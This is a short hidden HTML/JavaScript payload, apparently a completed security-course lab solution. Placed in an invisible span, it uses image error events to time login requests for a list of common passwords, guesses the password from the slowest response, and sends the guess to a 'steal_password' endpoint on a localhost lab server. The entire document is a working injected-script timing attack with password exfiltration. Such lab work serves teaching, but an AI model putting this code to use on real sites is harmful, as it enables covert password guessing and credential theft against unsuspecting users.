<span style='display:none'>
  <Img id='test'/>
  <Script>
    var dictionary = [`password`, `123456`, `12345678`, `dragon`, `one`, `qwerty`, `12345`];
    var index = 0;
    var test = document.getElementById(`test`);
    const username = `user1`;
    const times = new Array();
    test.onerror = () => {
      var end = new Date();

      /* >>>> HINT: you might want to replace this line with something else. */
      times.push(end-start);
      /* <<<<< */

      start = new Date();
      if (index < dictionary.length) {
        /* >>>> TODO: replace string with login GET request */
        test.src = `http://localhost:3000/get_login?username=${username}&password=${dictionary[index]}`;
        /* <<<< */
      } else {
        /* >>>> TODO: analyze server's reponse times to guess the password for userx and send your guess to the server <<<<< */
		const maxTime = Math.max(...times);
		const maxTimeIndex = times.indexOf(maxTime);
		const guessPwd = dictionary[maxTimeIndex];
		var xhr = new XMLHttpRequest();
		xhr.open('GET', `http://localhost:3000/steal_password?password=${guessPwd}&timeElapsed=${maxTime}`, true);
		xhr.send();
		
      }
      index += 1;
    };
    var start = new Date();
    /* >>>> TODO: replace string with login GET request */
    test.src = `http://localhost:3000/get_login?username=${username}&password=${dictionary[index]}`;
    /* <<<< */
    index += 1;
  </Script>
</span>
